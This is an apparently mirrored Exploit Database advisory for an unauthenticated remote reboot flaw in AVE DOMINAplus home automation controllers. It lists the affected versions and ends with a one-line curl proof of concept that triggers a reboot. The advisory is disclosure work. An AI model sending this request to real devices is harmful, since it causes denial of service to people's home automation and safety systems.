AVE DOMINAplus 1.10.x – Unauthenticated Remote Reboot

• Exploit Database
• 14 阅读

• 作者： LiquidWorm
  日期： 2019-12-30
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/47820/

• # Exploit: AVE DOMINAplus 1.10.x - Unauthenticated Remote Reboot
  # Date: 2019-12-30
  # Author: LiquidWorm
  # Vendor: AVE S.p.A.
  # Product web page: https://www.ave.it | https://www.domoticaplus.it
  # Affected version: Web Server Code 53AB-WBS - 1.10.62
  # Advisory ID: ZSL-2019-5548
  # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5548.php
  
  AVE DOMINAplus <=1.10.x Unauthenticated Remote Reboot
  
  
  Vendor: AVE S.p.A.
  Product web page: https://www.ave.it | https://www.domoticaplus.it
  Affected version: Web Server Code 53AB-WBS - 1.10.62
  Touch Screen Code TS01 - 1.0.65
  Touch Screen Code TS03x-V | TS04X-V - 1.10.45a
  Touch Screen Code TS05 - 1.10.36
  Models: 53AB-WBS
  TS01
  TS03V
  TS04X-V
  TS05N-V
  App version: 1.10.77
  App version: 1.10.65
  App version: 1.10.64
  App version: 1.10.62
  App version: 1.10.60
  App version: 1.10.52
  App version: 1.10.52A
  App version: 1.10.49
  App version: 1.10.46
  App version: 1.10.45
  App version: 1.10.44
  App version: 1.10.35
  App version: 1.10.25
  App version: 1.10.22
  App version: 1.10.11
  App version: 1.8.4
  App version: TS1-1.0.65
  App version: TS1-1.0.62
  App version: TS1-1.0.44
  App version: TS1-1.0.10
  App version: TS1-1.0.9
  
  Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System.
  Designed to revolutionize your concept of living. DOMINA plus is the AVE home
  automation proposal that makes houses safer, more welcoming and optimized. In
  fact, our home automation system introduces cutting-edge technologies, designed
  to improve people's lifestyle. DOMINA plus increases comfort, the level of safety
  and security and offers advanced supervision tools in order to learn how to
  evaluate and reduce consumption through various solutions dedicated to energy
  saving.
  
  Desc: The application suffers from an unauthenticated reboot command execution.
  Attackers can exploit this issue to cause a denial of service scenario.
  
  Tested on: GNU/Linux 4.1.19-armv7-x7
   GNU/Linux 3.8.13-bone50/bone71.1/bone86
   Apache/2.4.7 (Ubuntu)
   Apache/2.2.22 (Debian)
   PHP/5.5.9-1ubuntu4.23
   PHP/5.4.41-0+deb7u1
   PHP/5.4.36-0+deb7u3
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2019-5548
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5548.php
  
  
  06.10.2019
  
  --
  
  curl -sk https://192.168.1.10/restart.php >/dev/null